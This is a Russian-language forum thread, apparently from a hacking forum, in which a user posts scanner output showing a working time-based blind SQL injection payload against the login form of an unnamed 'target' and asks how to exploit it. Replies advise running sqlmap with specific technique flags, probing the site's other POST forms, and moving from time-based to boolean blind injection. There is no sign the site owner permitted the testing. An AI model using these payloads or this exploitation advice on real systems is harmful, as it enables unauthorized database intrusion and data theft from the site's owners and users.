• XSS.stack #1 – первый литературный журнал от юзеров форума

Помощь с Sql Injection

D00mbla

RAID-массив
Пользователь
Регистрация
06.05.2022
Сообщения
85
Реакции
51
Добрый день форумчане, недавно вкатился в изучение уязвимостей веб приложений сейчас изучаю все что связано с sql injection

Вчера вечером сканировал один таргет и сканер выдал вот это:

Attack Details​


POST (multipart) input login was set to 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

Tests performed:
  • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.265
  • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.253
  • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.332
  • 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.184
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.257
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.314
  • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.11
Как я понимаю это блайнд иньекция, так как логин панель таргета на которой этот тест проводился не выдает ошибок а лишь реагирует на функцию sleep (как показано в ответе сканера)

Вопрос, как можно это эксплуатировать?
 
Добрый день форумчане, недавно вкатился в изучение уязвимостей веб приложений сейчас изучаю все что связано с sql injection

Вчера вечером сканировал один таргет и сканер выдал вот это:

Attack Details​


POST (multipart) input login was set to 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

Tests performed:
  • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.265
  • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.253
  • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.332
  • 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.184
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.257
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.314
  • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.11
Как я понимаю это блайнд иньекция, так как логин панель таргета на которой этот тест проводился не выдает ошибок а лишь реагирует на функцию sleep (как показано в ответе сканера)

Вопрос, как можно это эксплуатировать?
Это не говорит о том что здесь только слепая инъекция. Там и булеан может быть, и юнион. Запихни в sqlmap и чекни c --technique=BSTU
https://xss.pro/threads/69783/post-492045 - тут описывал примерно как инжектить правильно.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Если есть уязвимость в форме авторизации, то большая вероятность, что и в других местах есть. Собери все формы, где данные передаются методом POST и пробуй крутить. Добейся, чтобы вместо time based, было хотя бы blind. Сильно будешь выигрывать по времени.
 
реально ли раскрутить Time-based blind SQL injection. Полностью слепая инъекция.

или это пустая трата времени ?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
реально ли раскрутить Time-based blind SQL injection. Полностью слепая инъекция.

или это пустая трата времени ?
а почему нет. SQLMAP поддерживает --technique=T
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх